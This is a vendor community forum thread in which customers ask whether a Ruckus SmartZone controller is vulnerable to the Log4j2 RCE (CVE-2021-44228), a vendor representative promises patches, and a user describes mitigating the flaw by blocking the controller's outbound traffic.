cancel
Showing results for 
Search instead for 
Did you mean: 

[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee
New Contributor II

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.


The customer asked if the SmartZone has the following this security vulnerabilities.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

91 REPLIES 91

@JTakaMT

Apologies for the inconvenience. The patch for all codes should be released by today "12/17/2021" EOD. The goal is :

We will have a KBA showing the process for loading the KSP on SZ.
The fixes /KSPs will be open for download for customers with/or without a support.
The aim is to ensure that our customers have the ability to self-help on existing versions as much as possible.

Atlast,Sorry for the delay, but this will be a better outcome for all our customers and us, once completed.

Best Regards

Vineet

 

sven_siersdorfe
New Contributor II

I also don't get any information about the patch via chat or support case.

We need a solution here very quickly.

@sven_siersdorfer

Apologies for the inconvenience. The patch for all codes should be released by today "12/17/2021" EOD. The goal is :

We will have a KBA showing the process for loading the KSP on SZ.
The fixes /KSPs will be open for download for customers with/or without a support.
The aim is to ensure that our customers have the ability to self-help on existing versions as much as possible.

Atlast,Sorry for the delay, but this will be a better outcome for all our customers and us, once completed.

Best Regards

Vineet

 

Thank you Vineet

diego_garcia_de
Contributor III

To anyone wanting to mitigate the impact, the vulnerability has two parts:

1) Information disclosure. This one is hard to contain as it basically means the system is able to leak internal data via DNS requests. But this mechanism will not "infect" the system. Some information such as internal usernames, process permissions, environment variables can be leaked to external parties. But the vSZ will not be infected.

2) Full in "remote code execution". This part of the attack means an external party is able to force the system to DOWNLOAD code and execute it. This one is the most dangerous one.

In my case, I have been able to mitigate the RCE (#2) by blocking all outgoing communication from smartzone. You will have to add certain entries to the allow-list/whitelist such as any LDAP or RADIUS servers, syslog and email servers used for notifications and system logging, FTP/SFTP servers for backups, SPOT servers if you're using location based services,  but pretty much all other outgoing communication can be blocked.

This means that if the system TRIES to download the  malware, it should be blocked by the external firewall. 

In my case, smartzone is deployed in google cloud so I rely on google's cloud firewall to configure the blocks. I have only had communication to two IPs which I believe are either part of the licensing servers or something similar (it was akamai IPs). 

In my case, we have a lets-encrypt certificate on the server so im seeing certain connections to "ocsp.int-x3.letsencrytp.org"